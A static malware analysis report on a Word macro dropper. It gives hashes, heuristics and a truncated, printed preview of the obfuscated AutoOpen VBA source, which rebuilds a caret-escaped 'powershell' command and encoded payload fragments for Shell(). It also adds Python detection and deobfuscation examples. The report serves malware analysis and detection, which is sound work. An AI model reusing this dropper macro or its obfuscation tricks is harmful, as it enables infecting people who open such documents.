Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 97dd6f23f3076074…

MALICIOUS

Office (OLE)

Size: 81.5 KB
Created: 2017-10-31 08:05:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: ec6fb801d6ecedb324ee0bf1e23dd5e5
SHA-1: 301f574745cab07508658a1ad42ba3c70cd591bb
SHA-256: 97dd6f23f30760741698234b1fe42fdb9f2cb4e1ba37ca2c653dcecdc4c6d710
Risk score: 244

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a Word document in the legacy OLE (CFB) container carrying a VBA project. An AutoOpen macro runs as soon as the document is opened with macros enabled and passes a string to Shell(), so execution needs no user action beyond enabling content. The extracted source assembles that string from Mid() slices of junk-padded literals: one slice is a chain of cmd.exe `set` statements whose caret-escaped fragments ("p^o^w^e^r^s", "he^l^l") reassemble to "powershell" once cmd.exe strips the carets, and the other slices shown in the preview are base64 of UTF-16LE text, the encoding PowerShell accepts for -EncodedCommand. That is the profile of a macro downloader, and the ClamAV signature Doc.Dropper.Agent-6361382-0 is consistent with it. The second-stage URL is not exposed by static extraction (the only URLs recovered are OOXML schema namespaces) and no network or process activity is recorded in this static report, so the download-and-execute conclusion rests on how the macro is built rather than on observed behaviour.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6361382-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6361382-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
    All three are OOXML XML namespace identifiers that Word writes into ordinary documents; they are not network indicators and should not be mistaken for the macro's download location, which is not visible in the static extraction.
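The following is an added example, not the report's detection engine or any code from it: a small Python scanner that reproduces the source-level heuristics listed above (auto-exec entry point, Shell-style execution token, long base64-like runs) and adds a check for the caret-escaped cmd.exe tokens seen in the macro preview. The identifiers OLE_VBA_AUTOOPEN and OLE_VBA_SHELL are the report's; B64_LIKE_BLOBS, CMD_CARET_ESCAPE, the severity mapping, the verdict rule and the sample VBA text are constructed here for illustration.

```python
import re

# Constructed sample VBA source (not the sample's own macro). It reproduces the patterns the
# preview shows: an auto-exec entry point, a Shell call, a junk-padded Mid() literal holding
# caret-escaped cmd.exe tokens, and a long base64-like run.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Sub AutoOpen()
    Dim c As String, p As String
    c = Mid("JUNKset %a%=p^o^w^e^r^s&&set %b%=he^l^lJUNK", 5, 35)
    p = Mid("XXAAgACwAIAAxADEANgAsADEAMQA2ACwAMQAxADIAIAAsACAANQA4ACAAXX", 3, 55)
    Shell c & " " & p, vbHide
End Sub
'''

# Auto-execution entry points Word/Excel run without a click once macros are enabled.
AUTOEXEC = re.compile(
    r"\b(AutoOpen|Auto_Open|Document_Open|AutoExec|AutoClose|Workbook_Open)\b", re.I)
# Execution / download primitives (the report's OLE_VBA_SHELL looks for Shell).
EXEC_TOKENS = re.compile(
    r"\b(Shell|ShellExecute|WScript\.Shell|CreateObject|URLDownloadToFile|XMLHTTP)\b", re.I)
# Long base64-like run; junk padding is base64-alphabet too, so the run is counted whole.
B64_LIKE = re.compile(r"[A-Za-z0-9+/=]{40,}")
# Caret-escaped cmd.exe tokens such as p^o^w^e^r^s or he^l^l.
CARET_ESCAPED = re.compile(r"\w*(?:\w\^){2,}\w")


def scan_vba(src):
    """Return {finding_id: {...}} for the heuristics that fire on decoded VBA source."""
    findings = {}
    auto = sorted(set(AUTOEXEC.findall(src)))
    if auto:
        findings["OLE_VBA_AUTOOPEN"] = {"severity": "high", "evidence": auto}
    execs = sorted(set(EXEC_TOKENS.findall(src)))
    if execs:
        findings["OLE_VBA_SHELL"] = {"severity": "critical", "evidence": execs}
    blobs = B64_LIKE.findall(src)
    if blobs:
        findings["B64_LIKE_BLOBS"] = {"severity": "info", "count": len(blobs),
                                      "max_len": max(len(b) for b in blobs)}
    carets = CARET_ESCAPED.findall(src)
    if carets:
        findings["CMD_CARET_ESCAPE"] = {"severity": "medium", "evidence": carets}
    return findings


def verdict(findings):
    """Constructed rule: auto-exec plus an execution primitive is the dropper profile."""
    if "OLE_VBA_AUTOOPEN" in findings and "OLE_VBA_SHELL" in findings:
        return "malicious"
    return "suspicious" if findings else "clean"


if __name__ == "__main__":
    result = scan_vba(SAMPLE_VBA)
    for fid, detail in result.items():
        print(fid, detail)
    print("verdict:", verdict(result))
```

Run it against the decoded macros.bas of a real sample instead of SAMPLE_VBA (for example the output of `olevba --decode`) and the blob count will be inflated by padding, exactly as the report's "29 long base64-like blob(s)" is; the caret check is the cheap signal that the string is destined for cmd.exe rather than being data.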

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11695 bytes
SHA-256: c4a5a13b1f632c94275923a392678767fcbe63038dce7e97726206486b967f06
Detection
ClamAV: No threats found on the decoded source. The Doc.Dropper.Agent-6361382-0 hit above matched the sample file itself, so a clean verdict on the carved text is expected and not exculpatory.
Obfuscation or payload: likely
Carved artifact contains 29 long base64-like blob(s). Each literal is wrapped in random alphanumeric padding and only the Mid()-selected slice is real content, so the blobs do not decode as written; they have to be cut with the macro's own start/length arguments and concatenated in the macro's order first.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "juuOHkBVz"
Function nNvOoPmVs()

WtFvFTY = Mid("IT55XXP8JFT9XVK25BWDAANAAgACwAIAAxADEANgAsADEAMQA2ACwAMQAxADIAIAAsACAANQA4ACAALAA0ADcAIAAsACAANAA3ACAALAAxADEAMgAgACwAIAAxADAAOAAsADkANwAsACAAMQAxADAAIAAsACAAMQAxADEAIAAsADkAOQAsACAAMQAwADEAIAAsACAAMQAxADQAIAAsACAAMQAxADEALAA0ADYALAAgADkAOQAgACwAMQANPZ4WT1KXVNTWKXGXI", 20, 230)
mWCqrdt = WtFvFTY

wswWuvB = Mid("ZQZSYVXBset %ctBLLaAtR%=ASdNIucqv&&set %nNvOoPmVs%=p^o^w^e^r^s&&set %CjSkFbRKI%=biWdJBusi&&set %kpElqPUYr%=he^l^l&&set %qcPvGAtJu%=UODWccDO4", 9, 129)
kjilvShrzz = wswWuvB

khLhEMoWLnM = Mid("MUWYAMQAxADcAIAAsACAAMQAxADQALAAgADEAMAA4ACwAMQAxADUAIAAsADMAMgAgACwAIAA2ADEALAAgADMAMgAgACwAMwA5ACAALAAxADAANAAsACAAMQAxADYALAAxADEANgAsACAAMQAxADIALAAgADUAOAAgACwAIAA0ADcALAA0ADcAIAAsACAAOQA4ACwAMQAwADEAIAAs6AQHAY1C2ILJ597M348K52YDFGT", 5, 205)
ALUbrksMdkf = khLhEMoWLnM

uTQCPzBwGun = Mid("ZYGD44YRAALAAgADEAMAA1ACwAMQAxADEALAAxADEAMAAsADQANgAsACAANwA3ACwAIAAxADAAMQAsACAAMQAxADUAIAAsACAAMLYBFSSM4E", 9, 91)
WqzqOuXPS = uTQCPzBwGun

zZfXD = Mid("XKZTJL4ACAALAAxADEAMgAgACwANQA4ACwAIAA0ADcALAAgADQANwAsADEAMAAyACAALAAgADkANwAgACwAMQAwADgAIAAsADEAMAA3ACwAOQA3ACAALAAxADAAOAAgACwAIAA0ADYALAAxADAAMAAsADEAMAAxACAALAA0ADcALAAgADEAMAA3D9U9", 8, 176)
NWMEdrh = zZfXD

bpmWcjajown = Mid("DFR8WNNIP9UVDMANgAgACwAIAAxADEANwAsADEAMQA0ACAALAAxADAAOAAsACAAMwAyACwAIAAxADAANQAsADEAMQAwACwAIAAzADIAPY9", 13, 91)
LfSZC = bpmWcjajown

YKhjPEXiXVc = Mid("970WA59RZ69GJNXCSWYM6SCOAAxADEANgAsADMAMgAsADgAMwAgACwAIAAxADIAMQAsADEAMQ8EAWJ1SPT1TFMVW", 25, 49)
qoUILfaUmN = YKhjPEXiXVc

hqjZmTM = Mid("ATZ8P2T5RWNAAzACAALAAxADEAMgAgACwAIAAxADAAOAAgACwAIAAxADAANQAsADEAMQA2ACwANAAwACwAIAAzADkALAA0ADQAIAAsACAAMwA5ACwAIAA0ADEAIAAsADUAOQAgACwAMwA2ACAALAAgADEAMQAwACwAOQA3ACAALAAgADEAMAA3A4A7", 12, 170)
zsmXnt = hqjZmTM

dIpwLDDNZ = Mid("L2EAMQA0ACAALAAgADEAMQAxACAALAAgADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQAgACwAIAAzADIAIAAsACAAMwA2ACwAIAAxADEAMgAsADkANwAgACwAMQAxADYAIAAsADEAMAA0ACwANQA5ACwAOQA4ACAALAAgADEAMQA0ACwAIAAxADAAMQAsACAAOQA3ACwAMQAwADcAIAAsADUAOQAsADEAMgA1ACwAOQA5ACAALAA5ADcALAAxADEANgAgACwAIAA5ADkAIAAsADEAMAA0ACAALAAgO186TJSMBAB0", 3, 294)
cESSwCWS = dIpwLDDNZ

YWhoiMFO = Mid("C8xADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACAALAAgADMAMgAsACAAMQAxADQALAA5ADcALAAgADEAMQAwACAALAAgADEAMAAwACwAMQAxADEALAAxADAAOQAsADUAOQAgACwAIAAzADYAIAAsACARGQBJWH1LAK289A65Y9", 3, 148)
wFHaGvk = YWhoiMFO

jjGOvOM = Mid("75ACwAIAAxADAAMQAsACAAMwAyACAALAAgADYAMQAsACAAMwAyACAALAAgADMANgAsADEAMQA0ACwAOQA3A0LFPI5YH95LCYT2T", 2, 82)
hJEZGQv = jjGOvOM

uCuXE = Mid("CKNAgADEAMAA1ACwAIAAxADEAMAAsACAAMQAwADMAIAAsADQAMAAsACAANAAxACwANAA0ACwAMwAyACwAIAAzADYALAAxADEAMgAsACAAOQA3ACwAIAAxADEANgAsADEAMAA0ACwAIAA0ADEALAAgADUAOQAsADgAMwAgACwAMQAxADYAIAAsADkANwAsACAAMQAxADQAIAAsACAAMQAxADYAIAAsADQANQAgACwAIAA4ADAAIAAsAD58D27M8T6W00UOZV", 4, 244)
sJGjnX = uCuXE

iYpHrzbT = Mid("5AbwByAEUAYQBjAEgAewAgACgAIABbAEkAbgBUAF0AJABfACAALQBBAFMAWwBjAGgAYQByAF0AKQB9ACkALQBKAE8AaQBOACcAJwApACAAWVIU5T65JEYMXKLRBO9TUTJXKD0C6NEV4U1H6W", 2, 105)
EMJjs = iYpHrzbT

lluBDrJ = Mid("JX9BHN3YT4QAxADIALAA1ADgAIAAsADQANwAgACwANAA3ACAALAAgADEAMQA2ACwAIAAxADEANQAgACwAIAAxADEAOAAgACwAMQAxADkALAAgADEAMAAxACwAMQAxADAALAAxADAANwAgACwAIAAxADAANAAsADEAMAAxACAALAAxADAANQAsACAAMQAwADkALAAgADQANgAgACwAMQAwADAAIAAsACAAMQAwADEALAAgADQAXA", 11, 231)
zGpWmWUtDt = lluBDrJ

UXdQK = Mid("9FN8ANAA2ACAALAA2ADgALAAgADEAMQAxACwAIAAxADEAOQAsACAAMQAxADAAIAAsADEAMAA4ACAALAAxADEAMQAsACXOVQIIYZB8RMZHOKJAX8VQ9H", 5, 87)
aFDHkzw = UXdQK

olquIDUOQOs = Mid("XAA0ADQALAAgADEAMAA0ACAALAAgADEAMQA2ACwAMQAxADYALAAxADEAMgAsADUAOAAsACAANAA3ACAALAA0ADcALAAxADAAMgAgACwAMQAxADQALAAgADEAMAAxACwAMQAwADEAIAAsADEAMAA3ACAALAAxADAAOQAsADEAMQAxACwAIAAxADAAMQAsADEAMQA0ACwAMQAwADkALAAgADkANwAsADEAML98JHPSRBIP0W1DCBSADTYP260WJX", 2, 224)
LkfrVjkuo = olquIDUOQOs

fXnVcErYSZv = Mid("OACAA
... (truncated)
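The string-building tricks in the preview can be undone without running the macro. The Python below is an added example, not the report's tooling or the sample's code: it takes two literals verbatim from the preview (the cmd.exe `set` chain read with Mid(..., 9, 129) and the fragment read with Mid(..., 2, 105)), applies VBA's 1-based Mid() semantics, strips cmd.exe carets, collects the `set %name%=value` pairs, and for the base64 fragment brute-forces the 4-character alignment that is needed because each Mid() slice begins part-way through a base64 group. The expansion template "%nNvOoPmVs%%kpElqPUYr%" and the decimal char-code list are constructed for illustration; the truncated preview does not show the line where the macro consumes those variables.

```python
import base64
import re

# Two literals copied verbatim from the macro preview, with the macro's own Mid() arguments.
CMD_LITERAL = "ZQZSYVXBset %ctBLLaAtR%=ASdNIucqv&&set %nNvOoPmVs%=p^o^w^e^r^s&&set %CjSkFbRKI%=biWdJBusi&&set %kpElqPUYr%=he^l^l&&set %qcPvGAtJu%=UODWccDO4"
CMD_MID = (9, 129)
PS_LITERAL = "5AbwByAEUAYQBjAEgAewAgACgAIABbAEkAbgBUAF0AJABfACAALQBBAFMAWwBjAGgAYQByAF0AKQB9ACkALQBKAE8AaQBOACcAJwApACAAWVIU5T65JEYMXKLRBO9TUTJXKD0C6NEV4U1H6W"
PS_MID = (2, 105)


def vba_mid(s, start, length):
    """VBA Mid(): start is 1-based, so Mid(s, 9, 129) is s[8:137] in Python terms."""
    return s[start - 1:start - 1 + length]


def strip_carets(s):
    """cmd.exe drops the escape caret before each character; scanners do not."""
    return s.replace("^", "")


SET_RE = re.compile(r"set\s+%([^%]+)%=([^&]*)", re.I)
VAR_RE = re.compile(r"%([^%]+)%")


def parse_cmd_sets(cmdline):
    """Collect the name/value pairs from a chain of set %name%=value statements."""
    return dict(SET_RE.findall(cmdline))


def expand_cmd_vars(template, env):
    """Expand %name% references the way cmd.exe would; unknown names are left alone."""
    return VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), template)


def decode_utf16le_b64(fragment):
    """Find the base64 alignment of a Mid()-sliced fragment of a UTF-16LE blob.

    Each slice may start with 1-3 leftover characters of a group that straddles the
    previous slice, so every offset 0..3 is tried and the one whose output looks like
    UTF-16LE printable ASCII (every high byte zero) wins. Returns (offset, text) or None.
    """
    for offset in range(4):
        body = fragment[offset:]
        body = body[:len(body) - len(body) % 4]       # drop a trailing partial group
        if not body:
            continue
        try:
            raw = base64.b64decode(body, validate=True)
        except ValueError:
            continue
        raw = raw[:len(raw) - len(raw) % 2]           # whole UTF-16 code units only
        if raw and not any(raw[1::2]) and all(0x20 <= b < 0x7F for b in raw[0::2]):
            return offset, raw.decode("utf-16-le")
    return None


def decode_char_codes(text):
    """Undo the ForEach { [int]$_ -as [char] } -join '' pattern: decimal codes to text."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", text))


def deobfuscate_preview():
    """Walk the two visible fragments and report what each one hides."""
    env = parse_cmd_sets(strip_carets(vba_mid(CMD_LITERAL, *CMD_MID)))
    # Constructed template: this is how cmd.exe would glue the two variables back together.
    interpreter = expand_cmd_vars("%nNvOoPmVs%%kpElqPUYr%", env)
    found = decode_utf16le_b64(vba_mid(PS_LITERAL, *PS_MID))
    offset, ps_text = found if found else (None, "")
    # Constructed char-code list, consistent with the decoded PowerShell fragment's decoder.
    demo = decode_char_codes("104, 116 ,116,112")
    return {"cmd_env": env, "interpreter": interpreter,
            "b64_offset": offset, "ps_fragment": ps_text, "char_code_demo": demo}


if __name__ == "__main__":
    for key, value in deobfuscate_preview().items():
        print(f"{key}: {value!r}")
```

The recovered PowerShell fragment is the tail of a `ForEach { [int]$_ -as [char] } -join ''` loop, which is why the remaining fragments are lists of decimal numbers rather than readable text: the macro hands PowerShell an array of character codes and lets it rebuild the command. To recover the full command, slice every literal in the module with its own Mid() arguments, concatenate the slices in the order the macro joins them, and then decode once, since a per-fragment decode only works where a slice happens to contain whole groups.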